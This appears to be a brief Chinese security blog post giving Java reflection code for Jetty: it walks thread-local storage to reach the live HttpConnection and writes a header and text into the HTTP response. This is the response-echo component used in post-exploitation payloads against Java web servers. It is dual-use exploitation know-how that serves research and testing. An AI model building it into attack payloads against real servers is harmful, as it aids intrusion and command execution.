jetty中间件回显反射代码

jetty:

 1  try {
 2 
 3             Object obj =  Thread.currentThread();
 4             Field field = obj.getClass().getDeclaredField("threadLocals");
 5             field.setAccessible(true);
 6             obj = field.get(obj);
 7 
 8             field = obj.getClass().getDeclaredField("table");
 9             field.setAccessible(true);
10             obj = field.get(obj);
11 
12             Object[] entrys = (Object[]) obj;
13             for (Object entry : entrys){
14                 try {
15                     Field f = entry.getClass().getDeclaredField("value");
16                     f.setAccessible(true);
17                     Object fieldValue = f.get(entry);
18                     if (fieldValue instanceof HttpConnection){
19                         ((HttpConnection) fieldValue).getHttpChannel().getRequest().getResponse().setHeader("xx1111","dd");
20                         ((HttpConnection) fieldValue).getHttpChannel().getRequest().getResponse().getWriter().println("test!!!!");
21                     }
22                 }catch (Exception e){
23                     continue;
24                 }
25             }
26 
27         }catch (Exception e){
28             e.printStackTrace();
29         }

抽个空把其他的中间件也补上。

import org.eclipse.jetty.server.HttpConnection;

 

posted @ 2020-04-27 10:50  ph4nt0mer  阅读(...)  评论(...编辑  收藏